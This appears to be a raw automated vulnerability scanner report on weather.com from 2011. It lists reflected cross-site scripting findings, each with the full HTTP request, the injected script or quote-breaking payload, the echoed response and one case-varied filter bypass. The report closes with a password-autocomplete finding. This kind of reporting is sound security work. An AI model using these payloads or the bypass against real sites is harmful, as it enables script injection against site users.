GET /pagelet8cd82%22-alert(%22XSS%22)-%22370523ec97/bc/favicon2.ico895a6"><script>alert(1)</script>4ee4cfc3b19 HTTP/1.1 Host: www.weather.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_vi=[CS]v1|26C5BF9A851580E4-60000176C014BBD4[CE]; 22029_022811_exposed=exposrvy; QualtricsSDSiteVisit=1300987738656; fv=-1; LocID=; RMID=c245359a4d8b7f55; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; rsi_segs=K06578_10038|K06578_10045|D08734_70117|D08734_70098|D08734_70105|D08734_71230|D08734_71432|K06578_10141|D08734_72009|K06578_10001; UserPreferences=3%7C%20%7C0%7Creal%7Cfast%7C-1%7C-1%7C-1%7C-1%7C-1%7C%20%7C%20%7C%20%7C%20%7C%20%7C-1%7CDriving%7C%20%7C%20%7C%20%7C%20%7Chp%7C4%7C%20%7C%20%7C%20%7C; s_pers=%20s_nr%3D1300988478489%7C1303580478489%3B; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221300987753825_646939%22%2C%22pv%22%3A7%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fwww.weather.com%2Fpagelet8cd82%5C%22-alert(%5C%22XSS%5C%22)-%5C%22370523ec97%2Fbc%2F56967%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A7%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22cp%22%3A%7B%22rmid%22%3A%22c245359a4d8b7f55%22%7D%2C%22f%22%3A1300988480444%7D
Response
HTTP/1.1 200 OK Cache-Control: max-age=30 Content-Language: en-US Content-Type: text/html;charset=UTF-8 Expires: Thu, 24 Mar 2011 17:43:41 GMT Server: Apache Vary: Accept-Encoding SVRNAME: wxii2x02 X-Varnish: 2184766087 Date: Thu, 24 Mar 2011 17:43:11 GMT Connection: keep-alive Content-Length: 160121 <!DOCTYPE HTML> <html lang="en"> <head> <TITLE>National and Local W...[SNIP]... <a href="/weather/map/interactive/bc/favicon2.ico895a6"><script>alert(1)</script>4ee4cfc3b19 " from="nav_secondary" >...[SNIP]...
1.28. http://www.weather.com/pagelet8cd82%22-alert(%22XSS%22)-%22370523ec97/bc/favicon2.ico [REST URL parameter 3]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.weather.com
Path:
/pagelet8cd82%22-alert(%22XSS%22)-%22370523ec97/bc/favicon2.ico
Issue detail
The value of REST URL parameter 3 is copied into the name of an HTML tag attribute. The payload 26243><script>alert(1)</script>dc934610b23 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pagelet8cd82%22-alert(%22XSS%22)-%22370523ec97/bc/favicon2.ico26243><script>alert(1)</script>dc934610b23 HTTP/1.1 Host: www.weather.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_vi=[CS]v1|26C5BF9A851580E4-60000176C014BBD4[CE]; 22029_022811_exposed=exposrvy; QualtricsSDSiteVisit=1300987738656; fv=-1; LocID=; RMID=c245359a4d8b7f55; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; rsi_segs=K06578_10038|K06578_10045|D08734_70117|D08734_70098|D08734_70105|D08734_71230|D08734_71432|K06578_10141|D08734_72009|K06578_10001; UserPreferences=3%7C%20%7C0%7Creal%7Cfast%7C-1%7C-1%7C-1%7C-1%7C-1%7C%20%7C%20%7C%20%7C%20%7C%20%7C-1%7CDriving%7C%20%7C%20%7C%20%7C%20%7Chp%7C4%7C%20%7C%20%7C%20%7C; s_pers=%20s_nr%3D1300988478489%7C1303580478489%3B; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221300987753825_646939%22%2C%22pv%22%3A7%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fwww.weather.com%2Fpagelet8cd82%5C%22-alert(%5C%22XSS%5C%22)-%5C%22370523ec97%2Fbc%2F56967%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A7%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22cp%22%3A%7B%22rmid%22%3A%22c245359a4d8b7f55%22%7D%2C%22f%22%3A1300988480444%7D
Response
HTTP/1.1 200 OK Cache-Control: max-age=30 Content-Language: en-US Content-Type: text/html;charset=UTF-8 Expires: Thu, 24 Mar 2011 17:43:38 GMT Server: Apache Vary: Accept-Encoding SVRNAME: wxii1x06 X-Varnish: 1156482513 Date: Thu, 24 Mar 2011 17:43:08 GMT Connection: keep-alive Content-Length: 160135 <!DOCTYPE HTML> <html lang="en"> <head> <TITLE>National and Local W...[SNIP]... <link rel="canonical" href="http://www.weather.com/pagelet8cd82"-alert("XSS")-"370523ec97/bc/favicon2.ico26243><script>alert(1)</script>dc934610b23 " />...[SNIP]...
1.29. http://www.weather.com/pagelet8cd82%22-alert(1)-%22370523ec97/bc/favicon2.ico [REST URL parameter 1]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.weather.com
Path:
/pagelet8cd82%22-alert(1)-%22370523ec97/bc/favicon2.ico
Issue detail
The value of REST URL parameter 1 is copied into the name of an HTML tag attribute. The payload c1f25><script>alert(1)</script>4e7a608d98c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pagelet8cd82%22-alert(1)-%22370523ec97c1f25><script>alert(1)</script>4e7a608d98c /bc/favicon2.ico HTTP/1.1 Host: www.weather.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_vi=[CS]v1|26C5BF9A851580E4-60000176C014BBD4[CE]; 22029_022811_exposed=exposrvy; QualtricsSDSiteVisit=1300987738656; fv=-1; LocID=; RMID=c245359a4d8b7f55; s_pers=%20s_nr%3D1300988433863%7C1303580433863%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; rsi_segs=K06578_10038|K06578_10045|D08734_70117|D08734_70098|D08734_70105|D08734_71230|D08734_71432|K06578_10141|D08734_72009|K06578_10001; UserPreferences=3%7C%20%7C0%7Creal%7Cfast%7C-1%7C-1%7C-1%7C-1%7C-1%7C%20%7C%20%7C%20%7C%20%7C%20%7C-1%7CDriving%7C%20%7C%20%7C%20%7C%20%7Chp%7C4%7C%20%7C%20%7C%20%7C; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221300987753825_646939%22%2C%22pv%22%3A6%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fwww.weather.com%2Fpagelet8cd82%5C%22-alert(1)-%5C%22370523ec97%2Fbc%2F56967%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A6%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22cp%22%3A%7B%22rmid%22%3A%22c245359a4d8b7f55%22%7D%2C%22f%22%3A1300988113570%7D
Response
HTTP/1.1 200 OK Cache-Control: max-age=30 Content-Language: en-US Content-Type: text/html;charset=UTF-8 Expires: Thu, 24 Mar 2011 17:41:29 GMT Server: Apache Vary: Accept-Encoding SVRNAME: wxii1x03 X-Varnish: 1510934644 Date: Thu, 24 Mar 2011 17:40:59 GMT Connection: keep-alive Content-Length: 160054 <!DOCTYPE HTML> <html lang="en"> <head> <TITLE>National and Local W...[SNIP]... <link rel="canonical" href="http://www.weather.com/pagelet8cd82"-alert(1)-"370523ec97c1f25><script>alert(1)</script>4e7a608d98c /bc/favicon2.ico" />...[SNIP]...
1.30. http://www.weather.com/pagelet8cd82%22-alert(1)-%22370523ec97/bc/favicon2.ico [REST URL parameter 1]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.weather.com
Path:
/pagelet8cd82%22-alert(1)-%22370523ec97/bc/favicon2.ico
Issue detail
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7c42e"-alert(1)-"d6b4ba102de was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pagelet8cd82%22-alert(1)-%22370523ec977c42e"-alert(1)-"d6b4ba102de /bc/favicon2.ico HTTP/1.1 Host: www.weather.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_vi=[CS]v1|26C5BF9A851580E4-60000176C014BBD4[CE]; 22029_022811_exposed=exposrvy; QualtricsSDSiteVisit=1300987738656; fv=-1; LocID=; RMID=c245359a4d8b7f55; s_pers=%20s_nr%3D1300988433863%7C1303580433863%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; rsi_segs=K06578_10038|K06578_10045|D08734_70117|D08734_70098|D08734_70105|D08734_71230|D08734_71432|K06578_10141|D08734_72009|K06578_10001; UserPreferences=3%7C%20%7C0%7Creal%7Cfast%7C-1%7C-1%7C-1%7C-1%7C-1%7C%20%7C%20%7C%20%7C%20%7C%20%7C-1%7CDriving%7C%20%7C%20%7C%20%7C%20%7Chp%7C4%7C%20%7C%20%7C%20%7C; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221300987753825_646939%22%2C%22pv%22%3A6%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fwww.weather.com%2Fpagelet8cd82%5C%22-alert(1)-%5C%22370523ec97%2Fbc%2F56967%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A6%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22cp%22%3A%7B%22rmid%22%3A%22c245359a4d8b7f55%22%7D%2C%22f%22%3A1300988113570%7D
Response
HTTP/1.1 200 OK Cache-Control: max-age=30 Content-Language: en-US Content-Type: text/html;charset=UTF-8 Expires: Thu, 24 Mar 2011 17:41:34 GMT Server: Apache Vary: Accept-Encoding SVRNAME: wxii1x06 X-Varnish: 1156439815 Date: Thu, 24 Mar 2011 17:41:04 GMT Connection: keep-alive Content-Length: 159973 <!DOCTYPE HTML> <html lang="en"> <head> <TITLE>National and Local W...[SNIP]... = ["beta:",replEnvStr].join(""); } else { serverEnv = ["live:",replEnvStr].join(""); } wx.config.page = { pageId: "62287", pageURL: "/pagelet8cd82"-alert(1)-"370523ec977c42e"-alert(1)-"d6b4ba102de /bc/favicon2.ico", locID: ("" === "") ? (Cookie.get("LocID")===null) ? "" : Cookie.get("LocID") : "", locType: "", locName: "", countryCode: "", serverdate: "3/2...[SNIP]...
1.31. http://www.weather.com/pagelet8cd82%22-alert(1)-%22370523ec97/bc/favicon2.ico [REST URL parameter 2]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.weather.com
Path:
/pagelet8cd82%22-alert(1)-%22370523ec97/bc/favicon2.ico
Issue detail
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dd22c"><script>alert(1)</script>c14811a6efd was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pagelet8cd82%22-alert(1)-%22370523ec97/bcdd22c"><script>alert(1)</script>c14811a6efd /favicon2.ico HTTP/1.1 Host: www.weather.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_vi=[CS]v1|26C5BF9A851580E4-60000176C014BBD4[CE]; 22029_022811_exposed=exposrvy; QualtricsSDSiteVisit=1300987738656; fv=-1; LocID=; RMID=c245359a4d8b7f55; s_pers=%20s_nr%3D1300988433863%7C1303580433863%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; rsi_segs=K06578_10038|K06578_10045|D08734_70117|D08734_70098|D08734_70105|D08734_71230|D08734_71432|K06578_10141|D08734_72009|K06578_10001; UserPreferences=3%7C%20%7C0%7Creal%7Cfast%7C-1%7C-1%7C-1%7C-1%7C-1%7C%20%7C%20%7C%20%7C%20%7C%20%7C-1%7CDriving%7C%20%7C%20%7C%20%7C%20%7Chp%7C4%7C%20%7C%20%7C%20%7C; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221300987753825_646939%22%2C%22pv%22%3A6%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fwww.weather.com%2Fpagelet8cd82%5C%22-alert(1)-%5C%22370523ec97%2Fbc%2F56967%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A6%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22cp%22%3A%7B%22rmid%22%3A%22c245359a4d8b7f55%22%7D%2C%22f%22%3A1300988113570%7D
Response
HTTP/1.1 200 OK Cache-Control: max-age=30 Content-Language: en-US Content-Type: text/html;charset=UTF-8 Expires: Thu, 24 Mar 2011 17:41:39 GMT Server: Apache Vary: Accept-Encoding SVRNAME: wxii1x04 X-Varnish: 1510938217 Date: Thu, 24 Mar 2011 17:41:09 GMT Connection: keep-alive Content-Length: 160104 <!DOCTYPE HTML> <html lang="en"> <head> <TITLE>National and Local W...[SNIP]... <a href="/weather/map/interactive/bcdd22c"><script>alert(1)</script>c14811a6efd /favicon2.ico" from="nav_secondary" >...[SNIP]...
1.32. http://www.weather.com/pagelet8cd82%22-alert(1)-%22370523ec97/bc/favicon2.ico [REST URL parameter 2]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.weather.com
Path:
/pagelet8cd82%22-alert(1)-%22370523ec97/bc/favicon2.ico
Issue detail
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d86df"-alert(1)-"56616f0ff68 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pagelet8cd82%22-alert(1)-%22370523ec97/bcd86df"-alert(1)-"56616f0ff68 /favicon2.ico HTTP/1.1 Host: www.weather.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_vi=[CS]v1|26C5BF9A851580E4-60000176C014BBD4[CE]; 22029_022811_exposed=exposrvy; QualtricsSDSiteVisit=1300987738656; fv=-1; LocID=; RMID=c245359a4d8b7f55; s_pers=%20s_nr%3D1300988433863%7C1303580433863%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; rsi_segs=K06578_10038|K06578_10045|D08734_70117|D08734_70098|D08734_70105|D08734_71230|D08734_71432|K06578_10141|D08734_72009|K06578_10001; UserPreferences=3%7C%20%7C0%7Creal%7Cfast%7C-1%7C-1%7C-1%7C-1%7C-1%7C%20%7C%20%7C%20%7C%20%7C%20%7C-1%7CDriving%7C%20%7C%20%7C%20%7C%20%7Chp%7C4%7C%20%7C%20%7C%20%7C; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221300987753825_646939%22%2C%22pv%22%3A6%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fwww.weather.com%2Fpagelet8cd82%5C%22-alert(1)-%5C%22370523ec97%2Fbc%2F56967%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A6%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22cp%22%3A%7B%22rmid%22%3A%22c245359a4d8b7f55%22%7D%2C%22f%22%3A1300988113570%7D
Response
HTTP/1.1 200 OK Cache-Control: max-age=30 Content-Language: en-US Content-Type: text/html;charset=UTF-8 Expires: Thu, 24 Mar 2011 17:41:44 GMT Server: Apache Vary: Accept-Encoding SVRNAME: wxii2x07 X-Varnish: 2184727898 Date: Thu, 24 Mar 2011 17:41:14 GMT Connection: keep-alive Content-Length: 160030 <!DOCTYPE HTML> <html lang="en"> <head> <TITLE>National and Local W...[SNIP]... ["beta:",replEnvStr].join(""); } else { serverEnv = ["live:",replEnvStr].join(""); } wx.config.page = { pageId: "62287", pageURL: "/pagelet8cd82"-alert(1)-"370523ec97/bcd86df"-alert(1)-"56616f0ff68 /favicon2.ico", locID: ("" === "") ? (Cookie.get("LocID")===null) ? "" : Cookie.get("LocID") : "", locType: "", locName: "", countryCode: "", serverdate: "3/24/2...[SNIP]...
1.33. http://www.weather.com/pagelet8cd82%22-alert(1)-%22370523ec97/bc/favicon2.ico [REST URL parameter 2]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.weather.com
Path:
/pagelet8cd82%22-alert(1)-%22370523ec97/bc/favicon2.ico
Issue detail
The value of REST URL parameter 2 is copied into the name of an HTML tag attribute. The payload df27c><script>alert(1)</script>4d53e0d49b1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pagelet8cd82%22-alert(1)-%22370523ec97/bcdf27c><script>alert(1)</script>4d53e0d49b1 /favicon2.ico HTTP/1.1 Host: www.weather.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_vi=[CS]v1|26C5BF9A851580E4-60000176C014BBD4[CE]; 22029_022811_exposed=exposrvy; QualtricsSDSiteVisit=1300987738656; fv=-1; LocID=; RMID=c245359a4d8b7f55; s_pers=%20s_nr%3D1300988433863%7C1303580433863%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; rsi_segs=K06578_10038|K06578_10045|D08734_70117|D08734_70098|D08734_70105|D08734_71230|D08734_71432|K06578_10141|D08734_72009|K06578_10001; UserPreferences=3%7C%20%7C0%7Creal%7Cfast%7C-1%7C-1%7C-1%7C-1%7C-1%7C%20%7C%20%7C%20%7C%20%7C%20%7C-1%7CDriving%7C%20%7C%20%7C%20%7C%20%7Chp%7C4%7C%20%7C%20%7C%20%7C; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221300987753825_646939%22%2C%22pv%22%3A6%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fwww.weather.com%2Fpagelet8cd82%5C%22-alert(1)-%5C%22370523ec97%2Fbc%2F56967%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A6%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22cp%22%3A%7B%22rmid%22%3A%22c245359a4d8b7f55%22%7D%2C%22f%22%3A1300988113570%7D
Response
HTTP/1.1 200 OK Cache-Control: max-age=30 Content-Language: en-US Content-Type: text/html;charset=UTF-8 Expires: Thu, 24 Mar 2011 17:41:36 GMT Server: Apache Vary: Accept-Encoding SVRNAME: wxii2x00 X-Varnish: 1097013162 Date: Thu, 24 Mar 2011 17:41:06 GMT Connection: keep-alive Content-Length: 160099 <!DOCTYPE HTML> <html lang="en"> <head> <TITLE>National and Local W...[SNIP]... <link rel="canonical" href="http://www.weather.com/pagelet8cd82"-alert(1)-"370523ec97/bcdf27c><script>alert(1)</script>4d53e0d49b1 /favicon2.ico" />...[SNIP]...
1.34. http://www.weather.com/weather-apps/ [REST URL parameter 1]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.weather.com
Path:
/weather-apps/
Issue detail
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e879e"-alert(1)-"0b38706c039 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /weather-appse879e"-alert(1)-"0b38706c039 / HTTP/1.1 Host: www.weather.com Proxy-Connection: keep-alive Referer: http://www.weather.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_vi=[CS]v1|26C5BF9A851580E4-60000176C014BBD4[CE]; 22029_022811_exposed=exposrvy; QualtricsSDSiteVisit=1300987738656; fv=2; RMID=c245359a4d8b7f55; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221300987753825_646939%22%2C%22pv%22%3A2%2C%22to%22%3A4.4%2C%22c%22%3A%22http%3A%2F%2Fwww.weather.com%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A2%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22cp%22%3A%7B%22rmid%22%3A%22c245359a4d8b7f55%22%7D%2C%22f%22%3A1300987770411%7D; rsi_segs=D08734_70117|D08734_70098|D08734_70105|D08734_71230|D08734_71432|D08734_72009|K06578_10001; UserPreferences=3%7C%20%7C0%7Creal%7Cfast%7C-1%7C-1%7C-1%7C-1%7C-1%7C%20%7C%20%7C%20%7C%20%7C%20%7C-1%7CUndeclared%7C%20%7C%20%7C%20%7C%20%7Chp%7C4%7C%20%7C%20%7C%20%7C; fromStr=nav_primary; s_pers=%20s_nr%3D1300987997794%7C1303579997794%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dtwciwx%253D%252526pid%25253Dhomepage%2525253A/index.html%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.weather.com/weather-apps/%252526ot%25253DA%3B
Response
HTTP/1.1 200 OK Cache-Control: max-age=30 Content-Language: en-US Content-Type: text/html;charset=UTF-8 Expires: Thu, 24 Mar 2011 17:37:55 GMT Server: Apache Vary: Accept-Encoding SVRNAME: wxii3x07 X-Varnish: 2366509814 Date: Thu, 24 Mar 2011 17:37:25 GMT Connection: keep-alive Content-Length: 159833 <!DOCTYPE HTML> <html lang="en"> <head> <TITLE>National and Local W...[SNIP]... beta/)) { serverEnv = ["beta:",replEnvStr].join(""); } else { serverEnv = ["live:",replEnvStr].join(""); } wx.config.page = { pageId: "62287", pageURL: "/weather-appse879e"-alert(1)-"0b38706c039 /", locID: ("" === "") ? (Cookie.get("LocID")===null) ? "" : Cookie.get("LocID") : "", locType: "", locName: "", countryCode: "", serverdate: "3/24/2011", ...[SNIP]...
1.35. http://www.weather.com/weather-apps/ [REST URL parameter 1]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.weather.com
Path:
/weather-apps/
Issue detail
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 17d05"><ScRiPt>alert(1)</ScRiPt>e409bdb67f4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".
Request
GET /weather-apps17d05"><ScRiPt>alert(1)</ScRiPt>e409bdb67f4 / HTTP/1.1 Host: www.weather.com Proxy-Connection: keep-alive Referer: http://www.weather.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_vi=[CS]v1|26C5BF9A851580E4-60000176C014BBD4[CE]; 22029_022811_exposed=exposrvy; QualtricsSDSiteVisit=1300987738656; fv=2; RMID=c245359a4d8b7f55; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221300987753825_646939%22%2C%22pv%22%3A2%2C%22to%22%3A4.4%2C%22c%22%3A%22http%3A%2F%2Fwww.weather.com%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A2%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22cp%22%3A%7B%22rmid%22%3A%22c245359a4d8b7f55%22%7D%2C%22f%22%3A1300987770411%7D; rsi_segs=D08734_70117|D08734_70098|D08734_70105|D08734_71230|D08734_71432|D08734_72009|K06578_10001; UserPreferences=3%7C%20%7C0%7Creal%7Cfast%7C-1%7C-1%7C-1%7C-1%7C-1%7C%20%7C%20%7C%20%7C%20%7C%20%7C-1%7CUndeclared%7C%20%7C%20%7C%20%7C%20%7Chp%7C4%7C%20%7C%20%7C%20%7C; fromStr=nav_primary; s_pers=%20s_nr%3D1300987997794%7C1303579997794%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dtwciwx%253D%252526pid%25253Dhomepage%2525253A/index.html%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.weather.com/weather-apps/%252526ot%25253DA%3B
Response
HTTP/1.1 200 OK Cache-Control: max-age=30 Content-Language: en-US Content-Type: text/html;charset=UTF-8 Expires: Thu, 24 Mar 2011 17:37:49 GMT Server: Apache Vary: Accept-Encoding SVRNAME: wxii1x05 X-Varnish: 1510862922 Date: Thu, 24 Mar 2011 17:37:19 GMT Connection: keep-alive Content-Length: 159916 <!DOCTYPE HTML> <html lang="en"> <head> <TITLE>National and Local W...[SNIP]... <link rel="canonical" href="http://www.weather.com/weather-apps17d05"><ScRiPt>alert(1)</ScRiPt>e409bdb67f4 /" />...[SNIP]...
2. Password field with autocomplete enabled
previous
next
There are 3 instances of this issue:
2.1. http://www.weather.com/activities/driving/rushhour/
previous
next
Summary
Severity:
Low
Confidence:
Certain
Host:
http://www.weather.com
Path:
/activities/driving/rushhour/
Issue detail
The page contains a form with the following action URL:https://registration.weather.com/ursa/login The form contains the following password field with autocomplete enabled:
Request
GET /activities/driving/rushhour/ HTTP/1.1 Host: www.weather.com Proxy-Connection: keep-alive Referer: http://www.weather.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_vi=[CS]v1|26C5BF9A851580E4-60000176C014BBD4[CE]; 22029_022811_exposed=exposrvy; QualtricsSDSiteVisit=1300987738656; fv=2; RMID=c245359a4d8b7f55; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221300987753825_646939%22%2C%22pv%22%3A2%2C%22to%22%3A4.4%2C%22c%22%3A%22http%3A%2F%2Fwww.weather.com%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A2%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22cp%22%3A%7B%22rmid%22%3A%22c245359a4d8b7f55%22%7D%2C%22f%22%3A1300987770411%7D; rsi_segs=D08734_70117|D08734_70098|D08734_70105|D08734_71230|D08734_71432|D08734_72009|K06578_10001; UserPreferences=3%7C%20%7C0%7Creal%7Cfast%7C-1%7C-1%7C-1%7C-1%7C-1%7C%20%7C%20%7C%20%7C%20%7C%20%7C-1%7CUndeclared%7C%20%7C%20%7C%20%7C%20%7Chp%7C4%7C%20%7C%20%7C%20%7C; fromStr=nav_secondary; s_pers=%20s_nr%3D1300987999757%7C1303579999757%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dtwciwx%253D%252526pid%25253Dhomepage%2525253A/index.html%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.weather.com/activities/driving/rushhour/%252526ot%25253DA%3B
Response
